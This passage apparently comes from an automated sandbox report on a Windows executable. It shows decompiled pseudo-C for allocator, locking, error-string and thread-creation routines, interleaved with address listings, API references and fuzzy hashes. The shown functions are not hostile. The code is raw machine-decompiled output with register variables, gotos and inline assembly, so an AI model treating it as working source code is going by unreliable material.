											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x4bb059;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E00403AC0(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E00403B00(_t217 + _t238, _t174, _t161);
									}
									 *0x4bbae8 = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00403EE8(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E00403AA4(_t217, _t213, _t140);
											E0040426C(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00403EE8((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00403EE8(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E0040426C(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}












































                                                            0x00404464
                                                            0x00404464
                                                            0x00404464
                                                            0x0040446c
                                                            0x0040446e
                                                            0x004044fc
                                                            0x004044ff
                                                            0x0040476c
                                                            0x0040476d
                                                            0x0040476e
                                                            0x00404771
                                                            0x00403d9c
                                                            0x00403d9d
                                                            0x00403d9e
                                                            0x00403d9f
                                                            0x00403da0
                                                            0x00403da3
                                                            0x00403da5
                                                            0x00403dac
                                                            0x00403db5
                                                            0x00403dba
                                                            0x00403ea1
                                                            0x00403ea3
                                                            0x00403eb6
                                                            0x00403eb8
                                                            0x00403eba
                                                            0x00403ebc
                                                            0x00403ec2
                                                            0x00403ec6
                                                            0x00403ec6
                                                            0x00403ec9
                                                            0x00403ec9
                                                            0x00403ed2
                                                            0x00403ed9
                                                            0x00403ed9
                                                            0x00403ea5
                                                            0x00403ea5
                                                            0x00403eaa
                                                            0x00403eaa
                                                            0x00403dc0
                                                            0x00403dc9
                                                            0x00403dcf
                                                            0x00403dcb
                                                            0x00403dcb
                                                            0x00403dcb
                                                            0x00403ddb
                                                            0x00403dea
                                                            0x00403df7
                                                            0x00403e67
                                                            0x00403e6e
                                                            0x00403e70
                                                            0x00403e72
                                                            0x00403e74
                                                            0x00403e7a
                                                            0x00403e7e
                                                            0x00403e7e
                                                            0x00403e81
                                                            0x00403e81
                                                            0x00403e91
                                                            0x00403e98
                                                            0x00403e98
                                                            0x00403df9
                                                            0x00403df9
                                                            0x00403e05
                                                            0x00403e0b
                                                            0x00000000
                                                            0x00403e0d
                                                            0x00403e1e
                                                            0x00403e22
                                                            0x00403e24
                                                            0x00403e24
                                                            0x00403e3a
                                                            0x00000000
                                                            0x00403e52
                                                            0x00403e54
                                                            0x00403e57
                                                            0x00403e60
                                                            0x00403e63
                                                            0x00403e63
                                                            0x00403e3a
                                                            0x00403e0b
                                                            0x00403df7
                                                            0x00403ee7
                                                            0x00404777
                                                            0x00404777
                                                            0x00404779
                                                            0x00404779
                                                            0x00404505
                                                            0x00404507
                                                            0x0040450a
                                                            0x0040450b
                                                            0x0040450e
                                                            0x00404511
                                                            0x00404514
                                                            0x00404516
                                                            0x00404517
                                                            0x0040462c
                                                            0x0040462f
                                                            0x00404631
                                                            0x00404724
                                                            0x0040472f
                                                            0x00404736
                                                            0x00404738
                                                            0x0040473b
                                                            0x00404740
                                                            0x00404741
                                                            0x00404743
                                                            0x00000000
                                                            0x00404745
                                                            0x00404745
                                                            0x0040474b
                                                            0x0040474d
                                                            0x0040474d
                                                            0x00404750
                                                            0x00404758
                                                            0x0040475f
                                                            0x0040476a
                                                            0x0040476a
                                                            0x00404637
                                                            0x00404637
                                                            0x0040463a
                                                            0x0040463d
                                                            0x0040463f
                                                            0x00000000
                                                            0x00404645
                                                            0x00404645
                                                            0x0040464c
                                                            0x004046a9
                                                            0x004046a9
                                                            0x004046ae
                                                            0x004046b4
                                                            0x004046b9
                                                            0x004046ba
                                                            0x004046ba
                                                            0x004046c6
                                                            0x004046d7
                                                            0x004046dd
                                                            0x004046dd
                                                            0x004046df
                                                            0x004046ec
                                                            0x004046f3
                                                            0x004046f7
                                                            0x004046f9
                                                            0x004046ff
                                                            0x00404701
                                                            0x00404703
                                                            0x00404703
                                                            0x004046e1
                                                            0x004046e1
                                                            0x004046e5
                                                            0x004046e5
                                                            0x00404708
                                                            0x00404708
                                                            0x0040470a
                                                            0x0040470d
                                                            0x00404714
                                                            0x00404716
                                                            0x0040471a
                                                            0x0040464e
                                                            0x0040464e
                                                            0x00404653
                                                            0x0040465b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040465d
                                                            0x0040465f
                                                            0x00404666
                                                            0x00000000
                                                            0x00404668
                                                            0x0040466c
                                                            0x00404671
                                                            0x00404672
                                                            0x00404678
                                                            0x00404680
                                                            0x00404686
                                                            0x0040468b
                                                            0x0040468c
                                                            0x00000000
                                                            0x0040468c
                                                            0x00404680
                                                            0x00000000
                                                            0x00404666
                                                            0x00404695
                                                            0x00404698
                                                            0x0040469b
                                                            0x0040469d
                                                            0x0040471d
                                                            0x0040471d
                                                            0x00000000
                                                            0x0040469f
                                                            0x0040469f
                                                            0x004046a2
                                                            0x004046a5
                                                            0x004046a7
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004046a7
                                                            0x0040469d
                                                            0x0040464c
                                                            0x0040463f
                                                            0x0040451d
                                                            0x00404520
                                                            0x00404522
                                                            0x0040452c
                                                            0x00404532
                                                            0x00404549
                                                            0x00404549
                                                            0x00404555
                                                            0x0040455b
                                                            0x0040455d
                                                            0x00404564
                                                            0x00404566
                                                            0x0040456b
                                                            0x00404573
                                                            0x00000000
                                                            0x00000000
                                                            0x00404575
                                                            0x00404577
                                                            0x0040457e
                                                            0x00000000
                                                            0x00404580
                                                            0x00404583
                                                            0x00404588
                                                            0x0040458e
                                                            0x00404596
                                                            0x0040459b
                                                            0x004045a0
                                                            0x00000000
                                                            0x004045a0
                                                            0x00404596
                                                            0x00000000
                                                            0x0040457e
                                                            0x004045a9
                                                            0x004045a9
                                                            0x004045a9
                                                            0x004045ae
                                                            0x004045b1
                                                            0x004045b3
                                                            0x004045b6
                                                            0x004045b9
                                                            0x004045c4
                                                            0x004045c6
                                                            0x004045c9
                                                            0x004045cb
                                                            0x004045cd
                                                            0x004045d3
                                                            0x004045d5
                                                            0x004045d5
                                                            0x004045bb
                                                            0x004045be
                                                            0x004045be
                                                            0x004045da
                                                            0x004045e0
                                                            0x004045e4
                                                            0x004045ea
                                                            0x004045f1
                                                            0x004045f1
                                                            0x004045f6
                                                            0x00404603
                                                            0x00404534
                                                            0x00404534
                                                            0x0040453a
                                                            0x00404604
                                                            0x00404608
                                                            0x0040460d
                                                            0x0040460f
                                                            0x00404611
                                                            0x00404619
                                                            0x00404620
                                                            0x00404625
                                                            0x00404625
                                                            0x0040462b
                                                            0x00404540
                                                            0x00404540
                                                            0x00404545
                                                            0x00404547
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404547
                                                            0x0040453a
                                                            0x00404524
                                                            0x00404524
                                                            0x00404528
                                                            0x00404528
                                                            0x00404522
                                                            0x00404517
                                                            0x00404474
                                                            0x00404474
                                                            0x00404476
                                                            0x0040447a
                                                            0x0040447d
                                                            0x0040447f
                                                            0x004044b8
                                                            0x004044bc
                                                            0x004044bd
                                                            0x004044bf
                                                            0x004044c1
                                                            0x004044c3
                                                            0x004044c6
                                                            0x004044c8
                                                            0x004044ca
                                                            0x004044cf
                                                            0x004044d1
                                                            0x004044d3
                                                            0x004044d9
                                                            0x004044db
                                                            0x004044db
                                                            0x004044e2
                                                            0x004044e2
                                                            0x004044e5
                                                            0x004044e7
                                                            0x004044f0
                                                            0x004044f5
                                                            0x004044f5
                                                            0x004044f7
                                                            0x004044f8
                                                            0x004044f9
                                                            0x004044fa
                                                            0x00404481
                                                            0x00404481
                                                            0x00404488
                                                            0x0040448a
                                                            0x00404490
                                                            0x00404492
                                                            0x00404494
                                                            0x00404499
                                                            0x0040449b
                                                            0x0040449d
                                                            0x0040449f
                                                            0x004044a1
                                                            0x004044ac
                                                            0x004044b1
                                                            0x004044b1
                                                            0x004044b3
                                                            0x004044b4
                                                            0x004044b5
                                                            0x0040448c
                                                            0x0040448c
                                                            0x0040448d
                                                            0x0040448e
                                                            0x0040448e
                                                            0x0040448a
                                                            0x0040447f

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                            • Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
                                                            • Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                            • Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041F7A0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				short _v558;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				void* _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				void* _v628;
				char _v632;
				void* _t64;
				intOrPtr _t65;
				long _t76;
				intOrPtr _t82;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t115;
				intOrPtr _t127;
				void* _t136;
				intOrPtr _t138;
				void* _t141;
				void* _t143;

				_t136 = __edi;
				_t140 = _t141;
				_v632 = 0;
				_v596 = 0;
				_v604 = 0;
				_v600 = 0;
				_v8 = 0;
				_push(_t141);
				_push(0x41f9a6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xfffffd8c;
				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
				_t143 = _t64;
				if(_t143 < 0) {
					_t65 =  *0x4ba798; // 0x40e730
					E0040C9F0(_t65,  &_v8, _t140);
				} else {
					if(_t143 == 0) {
						_t107 =  *0x4ba670; // 0x40e738
						E0040C9F0(_t107,  &_v8, _t140);
					} else {
						if(_t64 == 7) {
							_t110 =  *0x4ba4d0; // 0x40e740
							E0040C9F0(_t110,  &_v8, _t140);
						} else {
							_t112 =  *0x4ba5c8; // 0x40e748
							E0040C9F0(_t112,  &_v8, _t140);
						}
					}
				}
				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
				_t138 = _v36.State;
				if(_t138 == 0x1000 || _t138 == 0x10000) {
					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
					_t147 = _t76;
					if(_t76 == 0) {
						goto L12;
					} else {
						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
						_v588 = 5;
						E0040858C( &_v600, 0x105,  &_v558);
						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
						_v584 = _v596;
						_v580 = 0x11;
						_v576 = _v8;
						_v572 = 0x11;
						_v568 = _t115;
						_v564 = 5;
						_push( &_v592);
						_t103 =  *0x4ba6e0; // 0x40e810
						E0040C9F0(_t103,  &_v604, _t140, 3);
						E0041F2A0(_t115, _v604, 1, _t136, _t138);
					}
				} else {
					L12:
					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
					_v624 = 5;
					_v620 = _v8;
					_v616 = 0x11;
					_v612 = _t115;
					_v608 = 5;
					_push( &_v628);
					_t82 =  *0x4ba67c; // 0x40e6d8
					E0040C9F0(_t82,  &_v632, _t140, 2);
					E0041F2A0(_t115, _v632, 1, _t136, _t138);
				}
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(0x41f9ad);
				E00407A20( &_v632);
				E00407A80( &_v604, 3);
				return E00407A20( &_v8);
			}






































                                                            0x0041f7a0
                                                            0x0041f7a1
                                                            0x0041f7ad
                                                            0x0041f7b3
                                                            0x0041f7b9
                                                            0x0041f7bf
                                                            0x0041f7c5
                                                            0x0041f7ca
                                                            0x0041f7cb
                                                            0x0041f7d0
                                                            0x0041f7d3
                                                            0x0041f7df
                                                            0x0041f7df
                                                            0x0041f7e2
                                                            0x0041f7f0
                                                            0x0041f7f5
                                                            0x0041f7e4
                                                            0x0041f7e4
                                                            0x0041f7ff
                                                            0x0041f804
                                                            0x0041f7e6
                                                            0x0041f7e9
                                                            0x0041f80e
                                                            0x0041f813
                                                            0x0041f7eb
                                                            0x0041f81d
                                                            0x0041f822
                                                            0x0041f822
                                                            0x0041f7e9
                                                            0x0041f7e4
                                                            0x0041f82d
                                                            0x0041f840
                                                            0x0041f845
                                                            0x0041f84e
                                                            0x0041f86c
                                                            0x0041f871
                                                            0x0041f873
                                                            0x00000000
                                                            0x0041f879
                                                            0x0041f882
                                                            0x0041f888
                                                            0x0041f8a0
                                                            0x0041f8b1
                                                            0x0041f8bc
                                                            0x0041f8c2
                                                            0x0041f8cc
                                                            0x0041f8d2
                                                            0x0041f8d9
                                                            0x0041f8df
                                                            0x0041f8ec
                                                            0x0041f8f5
                                                            0x0041f8fa
                                                            0x0041f90c
                                                            0x0041f911
                                                            0x0041f915
                                                            0x0041f915
                                                            0x0041f91e
                                                            0x0041f924
                                                            0x0041f92e
                                                            0x0041f934
                                                            0x0041f93b
                                                            0x0041f941
                                                            0x0041f94e
                                                            0x0041f957
                                                            0x0041f95c
                                                            0x0041f96e
                                                            0x0041f973
                                                            0x0041f977
                                                            0x0041f97a
                                                            0x0041f97d
                                                            0x0041f988
                                                            0x0041f998
                                                            0x0041f9a5

                                                            APIs
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C
                                                              • Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                            • String ID: 0@$8@$@@$H@
                                                            • API String ID: 902310565-4161625419
                                                            • Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                            • Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
                                                            • Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                            • Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406688, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E00406688(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E00406B30(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040688C(_t71);
								_t57 =  *0x4bb8f8; // 0x4b9284
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E00406368( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}











                                                            0x0040668f
                                                            0x00406691
                                                            0x00406693
                                                            0x00406696
                                                            0x00406696
                                                            0x0040669d
                                                            0x004066a4
                                                            0x00000000
                                                            0x00000000
                                                            0x004066b2
                                                            0x004066b9
                                                            0x00406751
                                                            0x00406751
                                                            0x00406751
                                                            0x00406755
                                                            0x00000000
                                                            0x00000000
                                                            0x00406760
                                                            0x00406766
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406768
                                                            0x00406768
                                                            0x0040676d
                                                            0x00406773
                                                            0x0040677a
                                                            0x00406784
                                                            0x00406789
                                                            0x00406790
                                                            0x00406797
                                                            0x004067a5
                                                            0x004067b3
                                                            0x004067a7
                                                            0x004067af
                                                            0x004067af
                                                            0x004067a5
                                                            0x004067b9
                                                            0x004067db
                                                            0x004067e4
                                                            0x004067e8
                                                            0x004067ec
                                                            0x00000000
                                                            0x004067bb
                                                            0x004067bb
                                                            0x004067c0
                                                            0x00000000
                                                            0x00000000
                                                            0x004067cc
                                                            0x004067d2
                                                            0x00000000
                                                            0x00000000
                                                            0x004067d4
                                                            0x00000000
                                                            0x004067d4
                                                            0x004067bb
                                                            0x004067f1
                                                            0x004067f1
                                                            0x00406800
                                                            0x00406807
                                                            0x0040680a
                                                            0x0040680a
                                                            0x00000000
                                                            0x00406800
                                                            0x00000000
                                                            0x00406751
                                                            0x004066c4
                                                            0x004066ca
                                                            0x004066d0
                                                            0x0040672c
                                                            0x0040672f
                                                            0x00000000
                                                            0x00000000
                                                            0x00406736
                                                            0x0040673e
                                                            0x00406744
                                                            0x0040674f
                                                            0x00000000
                                                            0x0040674f
                                                            0x00406746
                                                            0x00000000
                                                            0x00406746
                                                            0x00000000
                                                            0x004066d2
                                                            0x004066d5
                                                            0x00000000
                                                            0x004066e4
                                                            0x004066e4
                                                            0x004066e4
                                                            0x00000000
                                                            0x004066ed
                                                            0x004066f0
                                                            0x00000000
                                                            0x00000000
                                                            0x004066f5
                                                            0x0040671e
                                                            0x00406722
                                                            0x00406727
                                                            0x0040672a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040672a
                                                            0x004066fe
                                                            0x00406704
                                                            0x00000000
                                                            0x00000000
                                                            0x0040670b
                                                            0x0040670e
                                                            0x00406715
                                                            0x00000000
                                                            0x00406715
                                                            0x00406811
                                                            0x0040681c

                                                            APIs
                                                              • Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33
                                                            • GetTickCount.KERNEL32 ref: 004066BF
                                                            • GetTickCount.KERNEL32 ref: 004066D7
                                                            • GetCurrentThreadId.KERNEL32 ref: 00406706
                                                            • GetTickCount.KERNEL32 ref: 00406731
                                                            • GetTickCount.KERNEL32 ref: 00406768
                                                            • GetTickCount.KERNEL32 ref: 00406792
                                                            • GetCurrentThreadId.KERNEL32 ref: 00406802
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CountTick$CurrentThread
                                                            • String ID:
                                                            • API String ID: 3968769311-0
                                                            • Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                            • Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
                                                            • Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                            • Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004971AC, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* _t23;
				char _t29;
				void* _t50;
				intOrPtr _t55;
				char _t57;
				intOrPtr _t59;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t64 = __edi;
				_t57 = __edx;
				_t50 = __ecx;
				_t68 = _t69;
				_t70 = _t69 + 0xfffffff0;
				_v20 = 0;
				if(__edx != 0) {
					_t70 = _t70 + 0xfffffff0;
					_t23 = E004062B0(_t23, _t68);
				}
				_t49 = _t50;
				_v5 = _t57;
				_t66 = _t23;
				_push(_t68);
				_push(0x4972a5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				E00405CB8(0);
				_t3 = _t66 + 0x2c; // 0x266461
				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				 *((char*)(_t66 + 0xd)) = _t29;
				if( *(_t66 + 0x2c) != 0) {
					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
				} else {
					if(_a4 == 0) {
						_t12 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
					} else {
						_t9 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
					}
					if( *((intOrPtr*)(_t66 + 8)) == 0) {
						E0041DFB0(GetLastError(), _t49, 0, _t66);
						_v16 = _v20;
						_v12 = 0x11;
						_t55 =  *0x4ba740; // 0x40ea6c
						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
						E0040711C();
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x4972ac);
				return E00407A20( &_v20);
			}


















                                                            0x004971ac
                                                            0x004971ac
                                                            0x004971ac
                                                            0x004971ad
                                                            0x004971af
                                                            0x004971b6
                                                            0x004971bb
                                                            0x004971bd
                                                            0x004971c0
                                                            0x004971c0
                                                            0x004971c5
                                                            0x004971c7
                                                            0x004971ca
                                                            0x004971ce
                                                            0x004971cf
                                                            0x004971d4
                                                            0x004971d7
                                                            0x004971de
                                                            0x004971e3
                                                            0x004971e9
                                                            0x004971ee
                                                            0x004971f6
                                                            0x004971fa
                                                            0x004971fa
                                                            0x004971fa
                                                            0x004971fc
                                                            0x00497203
                                                            0x00497284
                                                            0x0049728c
                                                            0x00497205
                                                            0x00497209
                                                            0x0049722c
                                                            0x0049723e
                                                            0x0049720b
                                                            0x00497211
                                                            0x00497224
                                                            0x00497224
                                                            0x00497245
                                                            0x00497251
                                                            0x00497259
                                                            0x0049725c
                                                            0x00497266
                                                            0x00497273
                                                            0x00497278
                                                            0x00497278
                                                            0x00497245
                                                            0x00497291
                                                            0x00497294
                                                            0x00497297
                                                            0x004972a4

                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247
                                                              • Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A
                                                            • GetCurrentThread.KERNEL32 ref: 0049727F
                                                            • GetCurrentThreadId.KERNEL32 ref: 00497287
                                                            Strings
                                                            Memory Dump Source
